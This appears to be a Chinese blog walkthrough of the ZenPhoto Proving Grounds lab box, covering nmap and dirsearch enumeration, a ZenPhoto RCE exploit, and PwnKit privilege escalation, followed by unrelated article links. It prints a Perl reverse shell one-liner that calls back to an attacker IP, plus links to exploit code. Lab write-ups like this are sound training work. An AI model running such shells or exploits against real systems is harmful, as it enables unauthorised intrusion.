nmap 
nmap -p- -A -sS 192.168.128.41

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-13 07:17 UTC

Nmap scan report for 192.168.128.41

Host is up (0.071s latency).

Not shown: 65531 closed tcp ports (reset)

PORT     STATE SERVICE VERSION

22/tcp   open  ssh     OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|   1024 83:92:ab:f2:b7:6e:27:08:7b:a9:b8:72:32:8c:cc:29 (DSA)

|_  2048 65:77:fa:50:fd:4d:9e:f1:67:e5:cc:0c:c6:96:f2:3e (RSA)

23/tcp   open  ipp     CUPS 1.4

|_http-server-header: CUPS/1.4

| http-methods:

|_  Potentially risky methods: PUT

|_http-title: 403 Forbidden

80/tcp   open  http    Apache httpd 2.2.14 ((Ubuntu))

|_http-server-header: Apache/2.2.14 (Ubuntu)

|_http-title: Site doesn't have a title (text/html).

3306/tcp open  mysql   MySQL (unauthorized)

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

TCP/IP fingerprint:

OS:SCAN(V=7.94SVN%E=4%D=1/13%OT=22%CT=1%CU=31646%PV=Y%DS=4%DC=T%G=Y%TM=6784

OS:BE54%P=x86_64-pc-linux-gnu)SEQ(SP=C6%GCD=1%ISR=D2%TI=Z%CI=Z%II=I%TS=8)OP

OS:S(O1=M578ST11NW6%O2=M578ST11NW6%O3=M578NNT11NW6%O4=M578ST11NW6%O5=M578ST

OS:11NW6%O6=M578ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)EC

OS:N(R=Y%DF=Y%T=40%W=16D0%O=M578NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=

OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(

OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%

OS:F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G

OS:%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp)

HOP RTT      ADDRESS

1   69.93 ms 192.168.45.1

2   69.91 ms 192.168.45.254

3   70.59 ms 192.168.251.1

4   71.42 ms 192.168.128.41

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 85.97 seconds

访问80端口 说是正在开发中



dirsearch扫描一下发现有test路径



上去看看



没啥东西

我们递归扫描

test路径 dirsearch -u http://192.168.128.41/test/

果不其然发现了一些新的东西

发现都是空文件夹

回到nmap

发现23 ipp端口暴露了版本号

搜索exp

https://www.exploit-db.com/exploits/41233 搜到个这个

但是好像打不了

卡了一小会

我拿bp抓包再次看了看/test/index.php

发现还有个路径 我们没发现

访问这个路径 我们就发现了后台

尝试弱口令admin admin

发现登录不上去

于是上网查找这个cms的漏洞 发现有好多

慢慢找 最终发现了这个rce 的exp

https://www.exploit-db.com/exploits/18083

rce成功!!!!!



尝试反弹shell

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.45.250:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

反弹成功

提权环节 发现一个比较特别的可执行suid 文件! X



也不知道是个啥东西

查看版本看看具体内容

上网搜exp

发现了一个

https://www.exploit-db.com/exploits/45697

好像不太行

看看数据库密码



登上去看看有啥

发现了admin的密码 但是我爆破了半天发现跑破不出来

再看看有无其他线索

在linpeas的帮助下 我们发现了sudo的版本过低

提权脚本

https://github.com/arthepsy/CVE-2021-4034/blob/main/cve-2021-4034-poc.c



提权成功

ZenPhoto pg walkthrough Intermediate的更多相关文章

  1. 简析服务端通过GT导入SHP至PG的方法

    文章版权由作者李晓晖和博客园共有,若转载请于明显处标明出处:http://www.cnblogs.com/naaoveGIS/ 1.背景 项目中需要在浏览器端直接上传SHP后服务端进行数据的自动入PG ...

  2. Bootstap datetimepicker报错TypeError: intermediate value

    Bootstrap datetimepicker有多个版本,官方的链接中,只是datepicker,没有时间的选择,原版的datetimepicker也不再更新,不能用新版的jquery.现在http ...

  3. PG 中 JSON 字段的应用

    13 年发现 pg 有了 json 类型,便从 oracle 转 pg,几年下来也算比较熟稔了,总结几个有益的实践. 用途一:存储设计时无法预料的文档性的数据.比如,通常可以在人员表准备一个 json ...

  4. pg gem 安装(postgresql94)

    使用下面命令安装报错 gem install pg 错误: [root@AS-test middle_database]# gem install pgBuilding native extensio ...

  5. #pg学习#postgresql的安装

    1.按照官网给的步骤编译安装(Mac安装是比较容易的,相比Liunx) cd /Users/renlipeng/Desktop/postgresql-9.5.1 ./configure --prefi ...

  6. PG 函数的易变性(Function Volatility Categories)

    此概念的接触是在做分区表的时候碰到的,分区表按时间字段分区,在查询时当where条件中时间为now()或者current_time()等时是无法查询的,即使进行格式转换也不行,只有是时间格式如‘201 ...

  7. c++错误——intermediate.manifest : general error c1010070很傻的错

    .\Debug\sadf.exe.intermediate.manifest : general error c1010070: Failed to load and parse the manife ...

  8. mysql 序列与pg序列的比较

    mysql序列(这里只谈innodb引擎): 在使用mysql的AUTO_INCREMENT时,使用AUTO_INCREMENT的字段必须建有索引,也可以为索引的一部分.当没有索引时会报错:      ...

  9. 使用zfs进行pg的pitr恢复测试

    前段时间做了一下zfs做pg的增量恢复测试,mark一下. 服务器信息: 主机:192.168.173.43 备机:192.168.173.41 主备使用流复制搭建,在备机上面进行了zfs快照备份. ...

  10. PG CREATEINDEX CONCURRENTLY

    PG CREATEINDEX CONCURRENTLY [TOC] 官方说法 根据9.1的文档 Creating an index can interfere with regular operati ...

随机推荐

  1. python基础之__init__.py

    如何使用 在 Python 中,当一个目录被作为包来使用时,它会在包中寻找一个名为 __init__.py 的文件.如果该文件存在,Python 会将它加载到内存中,并在其中执行所有的代码. __in ...

  2. 7.Kubernetes集群YAML文件详解

    Kubernetes集群YAML文件详解 概述 k8s 集群中对资源管理和资源对象编排部署都可以通过声明样式(YAML)文件来解决,也就是可以把需要对资源对象操作编辑到YAML 格式文件中,我们把这种 ...

  3. 【踩坑日记】uni-app相机抽帧,相机被多次初始化问题

    缘起:最近频繁接到使用我们AI运行识别插件用户的反馈,部分机型在uni中抽几帧后,就不再帧的了.开始以为又是小程序的API兼容的问题(确有机型出现过抽帧兼容性问题),后面越来越多的反馈在原生下无问题, ...

  4. MySQL-8.3.0 innovation 创新版本YUM安装配置

    MySQL-8.3.0 innovation版本已发布了,想抢先体验一下最新的功能,可以用以下的方式快速在虚拟机上安装一下哈 服务器环境:[root@node213 ~]# cat /etc/redh ...

  5. 使用 LLVM 框架创建有效的编译器,第 2 部分

    使用 clang 预处理 C/C++ 代码 无论您使用哪一种编程语言,LLVM 编译器基础架构都会提供一种强大的方法来优化您的应用程序.在这个两部分系列的第二篇文章中,了解在 LLVM 中测试代码,使 ...

  6. elementUI 表格之表头合并

    表头中有三个年份2018,2019和2020,每个年份下又有12个月份,后台返回的数据中每一个月份对应一个年份,类似下面这样 [{ year: '2018', month: '201801', }, ...

  7. Docker可视化容器管理工具之Portainer

    官网:https://www.portainer.io/ 仓库地址:https://hub.docker.com/r/portainer/ Portainer 是一个轻量级的管理 UI ,可让你轻松管 ...

  8. 一步步教你学会如何区域录制屏幕转换成gif图

    现在各种表情包都是gif图,包括很多可能比较短暂的操作步骤,录制gif图也要远比录制成视频要来的方便很多. 1. GIF文件通常比视频文件小,这使得它们在网络传输中更加高效,尤其是在带宽有限的情况下. ...

  9. 超详细!SED流编辑器从入门到精通

    在文本处理的世界里,SED流编辑器宛如一把瑞士军刀,功能强大且实用.无论是处理海量数据文件,还是批量修改配置文件,SED都能展现出其独特的魅力.今天,就让我们一同深入探索SED的奇妙世界,掌握其基础知 ...

  10. xlsx.js 表格的导出与导入

    1.xlsx简介 通俗的说,xlsx这个插件可以把html中的table元素或者json数据转换成表格后进行导出 <script src="https://cdn.bootcdn.ne ...